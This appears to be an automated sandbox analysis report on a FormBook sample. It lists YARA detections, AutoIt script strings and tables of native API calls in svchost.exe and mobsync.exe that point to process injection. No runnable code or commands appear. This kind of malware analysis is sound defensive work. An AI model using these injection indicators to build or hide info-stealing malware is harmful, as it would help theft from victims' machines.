                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3900807992.0000000002280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898728526.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668607265.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3898911867.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1668177200.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3899007570.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1669021668.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3900792299.0000000004940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: This is a third-party compiled AutoIt script.0_2_003B3D19
                Source: qbSIgCrCgw.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: qbSIgCrCgw.exe, 00000000.00000000.1431002540.000000000045E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_48752f60-d
                Source: qbSIgCrCgw.exe, 00000000.00000000.1431002540.000000000045E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: >SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_dab48205-8
                Source: qbSIgCrCgw.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e46f6e01-6
                Source: qbSIgCrCgw.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1d95702e-b
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C483 NtClose,2_2_0042C483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B60 NtClose,LdrInitializeThunk,2_2_03572B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03572DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,2_2_035735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574340 NtSetContextThread,2_2_03574340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574650 NtSuspendThread,2_2_03574650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BF0 NtAllocateVirtualMemory,2_2_03572BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BE0 NtQueryValueKey,2_2_03572BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B80 NtQueryInformationFile,2_2_03572B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BA0 NtEnumerateValueKey,2_2_03572BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AD0 NtReadFile,2_2_03572AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AF0 NtWriteFile,2_2_03572AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AB0 NtWaitForSingleObject,2_2_03572AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F60 NtCreateProcessEx,2_2_03572F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F30 NtCreateSection,2_2_03572F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FE0 NtCreateFile,2_2_03572FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572F90 NtProtectVirtualMemory,2_2_03572F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FB0 NtResumeThread,2_2_03572FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572FA0 NtQuerySection,2_2_03572FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E30 NtWriteVirtualMemory,2_2_03572E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EE0 NtQueueApcThread,2_2_03572EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572E80 NtReadVirtualMemory,2_2_03572E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572EA0 NtAdjustPrivilegesToken,2_2_03572EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D10 NtMapViewOfSection,2_2_03572D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D00 NtSetInformationFile,2_2_03572D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572D30 NtUnmapViewOfSection,2_2_03572D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DD0 NtDelayExecution,2_2_03572DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DB0 NtEnumerateKey,2_2_03572DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C70 NtFreeVirtualMemory,2_2_03572C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C60 NtCreateKey,2_2_03572C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C00 NtQueryInformationProcess,2_2_03572C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CC0 NtQueryVirtualMemory,2_2_03572CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CF0 NtOpenProcess,2_2_03572CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572CA0 NtQueryInformationToken,2_2_03572CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573010 NtOpenDirectoryObject,2_2_03573010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573090 NtSetValueKey,2_2_03573090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035739B0 NtGetContextThread,2_2_035739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D70 NtOpenThread,2_2_03573D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03573D10 NtOpenProcessToken,2_2_03573D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A84650 NtSuspendThread,LdrInitializeThunk,6_2_04A84650
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A84340 NtSetContextThread,LdrInitializeThunk,6_2_04A84340
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04A82CA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82C60 NtCreateKey,LdrInitializeThunk,6_2_04A82C60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04A82C70
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04A82DF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82DD0 NtDelayExecution,LdrInitializeThunk,6_2_04A82DD0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04A82D30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04A82D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04A82EE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82FB0 NtResumeThread,LdrInitializeThunk,6_2_04A82FB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82FE0 NtCreateFile,LdrInitializeThunk,6_2_04A82FE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82F30 NtCreateSection,LdrInitializeThunk,6_2_04A82F30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82AF0 NtWriteFile,LdrInitializeThunk,6_2_04A82AF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82AD0 NtReadFile,LdrInitializeThunk,6_2_04A82AD0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82B60 NtClose,LdrInitializeThunk,6_2_04A82B60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A835C0 NtCreateMutant,LdrInitializeThunk,6_2_04A835C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A839B0 NtGetContextThread,LdrInitializeThunk,6_2_04A839B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82CF0 NtOpenProcess,6_2_04A82CF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82CC0 NtQueryVirtualMemory,6_2_04A82CC0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82C00 NtQueryInformationProcess,6_2_04A82C00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82DB0 NtEnumerateKey,6_2_04A82DB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82D00 NtSetInformationFile,6_2_04A82D00
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82EA0 NtAdjustPrivilegesToken,6_2_04A82EA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82E80 NtReadVirtualMemory,6_2_04A82E80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82E30 NtWriteVirtualMemory,6_2_04A82E30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82FA0 NtQuerySection,6_2_04A82FA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82F90 NtProtectVirtualMemory,6_2_04A82F90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82F60 NtCreateProcessEx,6_2_04A82F60
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82AB0 NtWaitForSingleObject,6_2_04A82AB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82BA0 NtEnumerateValueKey,6_2_04A82BA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82B80 NtQueryInformationFile,6_2_04A82B80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82BE0 NtQueryValueKey,6_2_04A82BE0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A82BF0 NtAllocateVirtualMemory,6_2_04A82BF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A83090 NtSetValueKey,6_2_04A83090
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A83010 NtOpenDirectoryObject,6_2_04A83010
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A83D10 NtOpenProcessToken,6_2_04A83D10
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A83D70 NtOpenThread,6_2_04A83D70
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A59270 NtReadFile,6_2_02A59270
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A59370 NtDeleteFile,6_2_02A59370
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A59100 NtCreateFile,6_2_02A59100
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_02A59410 NtClose,6_2_02A59410
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F6606: CreateFileW,DeviceIoControl,CloseHandle,0_2_003F6606
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003EACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_003EACC5
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003F79D3
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003DB0430_2_003DB043
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E410F0_2_003E410F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D02A40_2_003D02A4
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E038E0_2_003E038E
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003BE3E30_2_003BE3E3
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E467F0_2_003E467F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D06D90_2_003D06D9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0041AACE0_2_0041AACE
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E4BEF0_2_003E4BEF
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003DCCC10_2_003DCCC1
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B6F070_2_003B6F07
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003BAF500_2_003BAF50
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CB11F0_2_003CB11F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003DD1B90_2_003DD1B9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_004131BC0_2_004131BC
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D123A0_2_003D123A
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003C32000_2_003C3200
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E724D0_2_003E724D
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B93F00_2_003B93F0
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003F13CA0_2_003F13CA
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CF5630_2_003CF563
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003FB6CC0_2_003FB6CC
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B96C00_2_003B96C0
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B77B00_2_003B77B0
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0041F7FF0_2_0041F7FF
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003E79C90_2_003E79C9
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CFA570_2_003CFA57
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003C3B700_2_003C3B70
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B9B600_2_003B9B60
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B7D190_2_003B7D19
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003CFE6F0_2_003CFE6F
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003D9ED00_2_003D9ED0
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_003B7FA30_2_003B7FA3
                Source: C:\Users\user\Desktop\qbSIgCrCgw.exeCode function: 0_2_0100AB500_2_0100AB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004183B32_2_004183B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029292_2_00402929
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029302_2_00402930
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAA32_2_0042EAA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBF32_2_0040FBF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DF02_2_00402DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DDF32_2_0040DDF3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025902_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004165B32_2_004165B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE132_2_0040FE13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF432_2_0040DF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF372_2_0040DF37
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA3522_2_035FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036003E62_2_036003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F02_2_0354E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E02742_2_035E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C02C02_2_035C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C81582_2_035C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA1182_2_035DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035301002_2_03530100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F81CC2_2_035F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036001AA2_2_036001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D20002_2_035D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035647502_2_03564750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035407702_2_03540770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C02_2_0353C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C6E02_2_0355C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035405352_2_03540535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036005912_2_03600591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F24462_2_035F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EE4F62_2_035EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB402_2_035FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F6BD72_2_035F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA802_2_0353EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035569622_2_03556962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360A9A62_2_0360A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A02_2_035429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354A8402_2_0354A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035428402_2_03542840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E8F02_2_0356E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035268B82_2_035268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F402_2_035B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560F302_2_03560F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03582F282_2_03582F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC82_2_03532FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354CFE02_2_0354CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BEFA02_2_035BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540E592_2_03540E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEE262_2_035FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEEDB2_2_035FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552E902_2_03552E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FCE932_2_035FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DCD1F2_2_035DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354AD002_2_0354AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353ADE02_2_0353ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03558DBF2_2_03558DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540C002_2_03540C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530CF22_2_03530CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0CB52_2_035E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352D34C2_2_0352D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F132D2_2_035F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0358739A2_2_0358739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B2C02_2_0355B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E12ED2_2_035E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035452A02_2_035452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360B16B2_2_0360B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352F1722_2_0352F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357516C2_2_0357516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354B1B02_2_0354B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EF0CC2_2_035EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035470C02_2_035470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F70E92_2_035F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF0E02_2_035FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF7B02_2_035FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F16CC2_2_035F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F75712_2_035F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DD5B02_2_035DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035314602_2_03531460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF43F2_2_035FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFB762_2_035FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B5BF02_2_035B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357DBF92_2_0357DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FB802_2_0355FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFA492_2_035FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7A462_2_035F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B3A6C2_2_035B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EDAC62_2_035EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DDAAC2_2_035DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03585AA02_2_03585AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035499502_2_03549950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B9502_2_0355B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D59102_2_035D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AD8002_2_035AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035438E02_2_035438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFF092_2_035FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03503FD22_2_03503FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03503FD52_2_03503FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03541F922_2_03541F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFFB12_2_035FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03549EB02_2_03549EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F1D5A2_2_035F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03543D402_2_03543D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7D732_2_035F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FDC02_2_0355FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B9C322_2_035B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFCF22_2_035FFCF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AFE4F66_2_04AFE4F6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AF44206_2_04AF4420
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B024466_2_04B02446
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B105916_2_04B10591
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A505356_2_04A50535
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A6C6E06_2_04A6C6E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A4C7C06_2_04A4C7C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A507706_2_04A50770
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A747506_2_04A74750
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AE20006_2_04AE2000
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B041A26_2_04B041A2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B101AA6_2_04B101AA
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B081CC6_2_04B081CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A401006_2_04A40100
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AEA1186_2_04AEA118
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AD81586_2_04AD8158
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AD02C06_2_04AD02C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AF02746_2_04AF0274
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04A5E3F06_2_04A5E3F0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B103E66_2_04B103E6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04B0A3526_2_04B0A352
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 6_2_04AF0CB56_2_04AF0CB5
